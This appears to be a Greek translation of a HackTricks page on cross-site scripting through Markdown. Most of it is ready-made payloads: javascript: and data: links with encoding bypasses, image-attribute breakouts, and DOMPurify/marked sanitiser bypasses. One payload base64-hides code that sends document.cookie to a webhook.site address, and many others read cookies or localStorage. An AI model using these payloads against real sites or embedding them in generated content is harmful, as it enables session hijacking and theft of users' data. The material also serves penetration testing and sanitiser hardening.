XSS in Markdown

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Αν έχετε την ευκαιρία να εισάγετε κώδικα στο markdown, υπάρχουν μερικές επιλογές που μπορείτε να χρησιμοποιήσετε για να ενεργοποιήσετε ένα XSS όταν ο κώδικας ερμηνεύεται.

Ετικέτες HTML

Ο πιο συνηθισμένος τρόπος να προκαλέσετε XSS στο markdown είναι να εισάγετε συνηθισμένες ετικέτες HTML που εκτελούν javascript, επειδή πολλοί ερμηνευτές markdown θα αποδεχτούν επίσης HTML.

<!-- XSS with regular tags -->
<script>alert(1)</script>
<img src=x onerror=alert(1) />

Μπορείτε να βρείτε περισσότερα παραδείγματα στην κύρια σελίδα XSS του hacktricks.

Σύνδεσμοι Javascript

Εάν οι ετικέτες HTML δεν είναι μια επιλογή, μπορείτε πάντα να δοκιμάσετε να παίξετε με τη σύνταξη του markdown:

<!-- markdow link to XSS, this usually always work but it requires interaction -->
[a](javascript:prompt(document.cookie))

<!-- Other links attacks with some bypasses -->
[Basic](javascript:alert('Basic'))
[Local Storage](javascript:alert(JSON.stringify(localStorage)))
[CaseInsensitive](JaVaScRiPt:alert('CaseInsensitive'))
[URL](javascript://www.google.com%0Aalert('URL'))
[In Quotes]('javascript:alert("InQuotes")')
[a](j a v a s c r i p t:prompt(document.cookie))
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:window.onerror=alert;throw%201)

Κατάχρηση σύνταξης εικόνας με συμβάντα

Η κατάχρηση της σύνταξης εικόνας με συμβάντα (Img event syntax abuse) είναι μια τεχνική εκμετάλλευσης που επιτρέπει σε έναν επιτιθέμενο να εισαγάγει κακόβουλο κώδικα σε μια ιστοσελίδα μέσω της εισαγωγής κακόβουλου κώδικα σε μια εικόνα. Αυτός ο κακόβουλος κώδικας εκτελείται όταν ο χρήστης προβάλλει την εικόνα στην ιστοσελίδα.

Για να επιτευχθεί αυτή η επίθεση, ο επιτιθέμενος εισάγει κακόβουλο κώδικα στον κατάλογο της εικόνας, χρησιμοποιώντας τη σύνταξη εικόνας Markdown. Ο κακόβουλος κώδικας μπορεί να είναι οποιουδήποτε τύπου, όπως JavaScript, HTML ή CSS, και μπορεί να προκαλέσει διάφορες επιπτώσεις, όπως την κλοπή προσωπικών πληροφοριών των χρηστών ή την παραβίαση της ασφάλειας της ιστοσελίδας.

Για να προστατευθείτε από αυτήν την επίθεση, πρέπει να επιβεβαιώσετε ότι οι εικόνες που ανεβαίνουν στην ιστοσελίδα σας είναι ασφαλείς και δεν περιέχουν κακόβουλο κώδικα. Επίσης, πρέπει να εφαρμόσετε φίλτρα εισόδου για να αποτρέψετε την εισαγωγή κακόβουλου κώδικα στις εικόνες που ανεβαίνουν στην ιστοσελίδα σας.

![Uh oh...]("onerror="alert('XSS'))
![Uh oh...](https://www.example.com/image.png"onload="alert('XSS'))
![Escape SRC - onload](https://www.example.com/image.png"onload="alert('ImageOnLoad'))
![Escape SRC - onerror]("onerror="alert('ImageOnError'))

Παράκαμψη του Markdown HTML Sanitiser

Ο παρακάτω κώδικας απολυμαίνει την είσοδο HTML και στη συνέχεια την περνά στον αναλυτή markdown, έτσι, μπορεί να προκληθεί XSS καταχρώντας τις λανθασμένες ερμηνείες μεταξύ του Markdown και του DOMPurify

<!--from https://infosecwriteups.com/clique-writeup-%C3%A5ngstromctf-2022-e7ae871eaa0e -->
<script src="https://cdn.jsdelivr.net/npm/dompurify@2.3.6/dist/purify.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/marked@4.0.14/lib/marked.umd.min.js"></script>
<script>
const qs = new URLSearchParams(location.search);
if (qs.get("content")?.length > 0) {
document.body.innerHTML = marked.parse(DOMPurify.sanitize(qs.get("content")));
}
</script>

Παραδείγματα Payloads:

<div id="1

![](contenteditable/autofocus/onfocus=confirm('qwq')//)">
-----------------------------------------------
<a title="a

<img src=x onerror=alert(1)>">yep</a>
------------------------------------------------
[x](y '<style>')<!--</style><div id="x--><img src=1 onerror=alert(1)>"></div>
----------------------------------------------
[<p x='<style onload=eval(atob(/bG9jYXRpb249YGh0dHBzOi8vd2ViaG9vay5zaXRlL2FiM2IyYjg5LTg1YTktNGU0YS1hNjg0LTUxN2M1ZjQwNmZmMj9mPWArZW5jb2RlVVJJQ29tcG9uZW50KGRvY3VtZW50LmNvb2tpZSk/.source))>](#'></p>)
----------------------------------------------
`<p x="`<img src=x onerror=alert(1)>"></p>

Fuzzing

Η τεχνική του Fuzzing (ή αλλιώς Fuzz Testing) είναι μια μέθοδος δοκιμής λογισμικού που χρησιμοποιείται για την ανίχνευση αδυναμιών ασφαλείας. Στην ουσία, το Fuzzing εκτελεί αυτόματα μεγάλους όγκους δεδομένων σε μια εφαρμογή με σκοπό να προκαλέσει σφάλματα ή ανεπιθύμητες συμπεριφορές. Αυτό μπορεί να οδηγήσει σε αποκάλυψη ευπαθειών όπως το Cross-Site Scripting (XSS).

Οι επιθέσεις XSS συμβαίνουν όταν κακόβουλος κώδικας ενσωματώνεται σε μια ιστοσελίδα και εκτελείται στον περιηγητή του χρήστη. Αυτό μπορεί να οδηγήσει σε κλοπή προσωπικών πληροφοριών, όπως κωδικοί πρόσβασης ή cookies σύνοδος. Για να εκτελεστεί μια επίθεση XSS, ο επιτιθέμενος πρέπει να εισάγει κακόβουλο κώδικα σε μια εισαγωγική περιοχή της ιστοσελίδας, όπως ένα πεδίο εισαγωγής ή ένα σχόλιο.

Για να ανιχνεύσετε ευπάθειες XSS με τη χρήση του Fuzzing, μπορείτε να χρησιμοποιήσετε εργαλεία όπως το Burp Suite ή το OWASP ZAP. Αυτά τα εργαλεία σας επιτρέπουν να αυτοματοποιήσετε τη διαδικασία της εισαγωγής μεγάλου όγκου δεδομένων σε μια εφαρμογή και να ελέγξετε αν υπάρχουν ευπάθειες XSS. Μπορείτε να προσαρμόσετε τα παραγόμενα δεδομένα για να εξετάσετε διάφορες περιπτώσεις επίθεσης, όπως εισαγωγή ετικετών HTML ή JavaScript.

Ανακαλύπτοντας ευπάθειες XSS με τη χρήση του Fuzzing, μπορείτε να βοηθήσετε τους προγραμματιστές να ενισχύσουν την ασφάλεια της εφαρμογής τους. Μπορείτε να αναφέρετε τις ευπάθειες που βρήκατε και να προτείνετε βελτιώσεις στον κώδικα για να αποτραπεί η εκμετάλλευσή τους από κακόβουλους επιτιθέμενους.

<!--
Fuzzing examples from
- https://github.com/cujanovic/Markdown-XSS-Payloads/blob/master/Markdown-XSS-Payloads.txt
- https://makandracards.com/makandra/481451-testing-for-xss-in-markdown-fields
-->

[a](javascript:prompt(document.cookie))
[a](j    a   v   a   s   c   r   i   p   t:prompt(document.cookie))
![a](javascript:prompt(document.cookie))\
<javascript:prompt(document.cookie)>
<&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
![a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29)
![a'"`onerror=prompt(document.cookie)](x)\
[citelol]: (javascript:prompt(document.cookie))
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
[test](javascript://%0d%0aprompt(1))
[test](javascript://%0d%0aprompt(1);com)
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
[notmalicious](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie)
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[clickme](vbscript:alert(document.domain))
_http://danlec_@.1 style=background-image:url();background-repeat:no-repeat;display:block;width:100%;height:100px; onclick=alert(unescape(/Oh%20No!/.source));return(false);//
<http://\<meta\ http-equiv=\"refresh\"\ content=\"0;\ url=http://danlec.com/\"\>>
[text](http://danlec.com " [@danlec](/danlec) ")
[a](javascript:this;alert(1))
[a](javascript:this;alert(1&#41;)
[a](javascript&#58this;alert(1&#41;)
[a](Javas&#99;ript:alert(1&#41;)
[a](Javas%26%2399;ript:alert(1&#41;)
[a](javascript:alert&#65534;(1&#41;)
[a](javascript:confirm(1)
[a](javascript://www.google.com%0Aprompt(1))
[a](javascript://%0d%0aconfirm(1);com)
[a](javascript:window.onerror=confirm;throw%201)
[a](javascript:alert(document.domain&#41;)
[a](javascript://www.google.com%0Aalert(1))
[a]('javascript:alert("1")')
[a](JaVaScRiPt:alert(1))
![a](https://www.google.com/image.png"onload="alert(1))
![a]("onerror="alert(1))
</http://<?php\><\h1\><script:script>confirm(2)
[XSS](.alert(1);)
[ ](https://a.de?p=[[/data-x=. style=background-color:#000000;z-index:999;width:100%;position:fixed;top:0;left:0;right:0;bottom:0; data-y=.]])
[ ](http://a?p=[[/onclick=alert(0) .]])
[a](javascript:new%20Function`al\ert\`1\``;)
[XSS](javascript:prompt(document.cookie))
[X
[XSS](&#x6A;&#x61;&#x76;&#x61;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x3A;&#x61;&#x6C;&#x65;&#x72;&#x74;&#x28;&#x27;&#x58;&#x53;&#x53;&#x27;&#x29;)
[XSS]: (javascript:prompt(document.cookie))
[XSS](javascript:window.onerror=alert;throw%20document.cookie)
[XSS](javascript://%0d%0aprompt(1))
[XSS](javascript://%0d%0aprompt(1);com)
[XSS](javascript:window.onerror=alert;throw%20document.cookie)
[XSS](javascript://%0d%0awindow.onerror=alert;throw%20document.cookie)
[XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[XSS](vbscript:alert(document.domain))
[XSS](javascript:this;alert(1))
[XSS](javascript:this;alert(1&#41;)
[XSS](javascript&#58this;alert(1&#41;)
[XSS](Javas&#99;ript:alert(1&#41;)
[XSS](Javas%26%2399;ript:alert(1&#41;)
[XSS](javascript:alert&#65534;(1&#41;)
[XSS](javascript:confirm(1)
[XSS](javascript://%0d%0aconfirm(1);com)
[XSS](javascript:window.onerror=confirm;throw%201)
[XSS](�javascript:alert(document.domain&#41;)
![XSS](javascript:prompt(document.cookie))\
![XSS](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)\
![XSS'"`onerror=prompt(document.cookie)](x)\
Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Last updated